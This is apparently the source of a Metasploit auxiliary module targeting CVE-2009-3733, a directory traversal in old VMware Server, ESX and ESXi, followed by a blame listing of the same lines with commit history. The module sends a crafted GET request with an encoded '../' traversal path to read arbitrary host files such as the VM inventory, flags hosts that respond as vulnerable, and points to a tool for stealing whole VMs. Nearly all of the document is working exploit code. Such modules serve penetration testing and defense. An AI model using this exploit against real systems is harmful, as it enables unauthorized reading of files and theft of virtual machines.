modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::HttpClient
  # Scanner mixin should be near last
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        => 'VMware Server Directory Traversal Vulnerability',
      'Description' => 'This modules exploits the VMware Server Directory Traversal
        vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
        2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
        allows remote attackers to read arbitrary files. Common VMware server ports
        80/8222 and 443/8333 SSL.  If you want to download the entire VM, check out
        the gueststealer tool.',
      'Author'      => 'CG' ,
      'License'     => MSF_LICENSE,
      'References'	=>
        [
          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],
          [ 'OSVDB', '59440' ],
          [ 'BID', '36842' ],
          [ 'CVE', '2009-3733' ],
          [ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]
        ]
    )
    register_options(
      [
        Opt::RPORT(8222),
        OptString.new('FILE', [ true,  "The file to view", '/etc/vmware/hostd/vmInventory.xml']),
        OptString.new('TRAV', [ true,  "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),
      ])
  end

  def run_host(target_host)

    begin
      file = datastore['FILE']
      trav = datastore['TRAV']
      res = send_request_raw({
        'uri'          => trav+file,
        'version'      => '1.1',
        'method'       => 'GET'
      }, 25)

      if res.nil?
        print_error("Connection timed out")
        return
      end

      if res.code == 200
        #print_status("Output Of Requested File:\n#{res.body}")
        print_good("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
        report_vuln(
          {
            :host   => target_host,
            :port	=> rport,
            :proto  => 'tcp',
            :name	=> self.name,
            :info   => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
            :refs   => self.references,
            :exploited_at => Time.now.utc
          }
        )
      else
        vprint_status("Received #{res.code} for #{trav}#{file}")
      end

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
      print_error(e.message)
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end
fix whitespace and add keywords 2010-02-25 00:13:56 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
fix whitespace and add keywords 2010-02-25 00:13:56 +00:00
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`# Exploit mixins should be called first`
			`include Msf::Exploit::Remote::HttpClient`
			`# Scanner mixin should be near last`
			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`

			`def initialize`
			`super(`
Fix up modules calling report_vuln() to use new syntax 2012-06-17 23:39:20 -05:00			`'Name' => 'VMware Server Directory Traversal Vulnerability',`
			`'Description' => 'This modules exploits the VMware Server Directory Traversal`
Msftidy run against a bunch of whitespace violations, a few line too longs. 2011-10-17 02:42:01 +00:00			`vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before`
			`2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5`
			`allows remote attackers to read arbitrary files. Common VMware server ports`
			`80/8222 and 443/8333 SSL. If you want to download the entire VM, check out`
			`the gueststealer tool.',`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`'Author' => 'CG' ,`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
fix URLs not resolving 2022-01-23 15:28:32 -05:00			`[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '59440' ],`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`[ 'BID', '36842' ],`
			`[ 'CVE', '2009-3733' ],`
fix whitespace and add keywords 2010-02-25 00:13:56 +00:00			`[ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]`
			`]`
			`)`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`register_options(`
			`[`
			`Opt::RPORT(8222),`
			`OptString.new('FILE', [ true, "The file to view", '/etc/vmware/hostd/vmInventory.xml']),`
			`OptString.new('TRAV', [ true, "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`end`

			`def run_host(target_host)`

fix whitespace and add keywords 2010-02-25 00:13:56 +00:00			`begin`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`file = datastore['FILE']`
			`trav = datastore['TRAV']`
			`res = send_request_raw({`
fix whitespace and add keywords 2010-02-25 00:13:56 +00:00			`'uri' => trav+file,`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`'version' => '1.1',`
			`'method' => 'GET'`
Fix undefined method error 2013-08-21 01:10:46 -05:00			`}, 25)`
vmware directory traversal module 2010-02-24 23:58:51 +00:00
Fix undefined method error 2013-08-21 01:10:46 -05:00			`if res.nil?`
			`print_error("Connection timed out")`
			`return`
			`end`

			`if res.code == 200`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`#print_status("Output Of Requested File:\n#{res.body}")`
print_status -> print_good. [When it is successful, show it!] 2017-07-14 00:09:35 +01:00			`print_good("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`report_vuln(`
Fixes #3643 . These modules now report_vuln() correctly. 2011-02-02 17:42:23 +00:00			`{`
			`:host => target_host,`
			`:port => rport,`
			`:proto => 'tcp',`
Fix up modules calling report_vuln() to use new syntax 2012-06-17 23:39:20 -05:00			`:name => self.name,`
			`:info => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",`
Deprecate the exploited_host table. Vulns that indicate a successful exploit without opening a session should set the :exploited_at timestamp. 2011-05-15 22:19:00 +00:00			`:refs => self.references,`
			`:exploited_at => Time.now.utc`
Fixes #3643 . These modules now report_vuln() correctly. 2011-02-02 17:42:23 +00:00			`}`
			`)`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`else`
Allow this module to be more verbose for future debugging 2012-05-04 15:47:30 -05:00			`vprint_status("Received #{res.code} for #{trav}#{file}")`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`end`

Allow this module to be more verbose for future debugging 2012-05-04 15:47:30 -05:00			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e`
			`print_error(e.message)`
vmware directory traversal module 2010-02-24 23:58:51 +00:00			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`end`
			`end`
fix whitespace and add keywords 2010-02-25 00:13:56 +00:00			`end`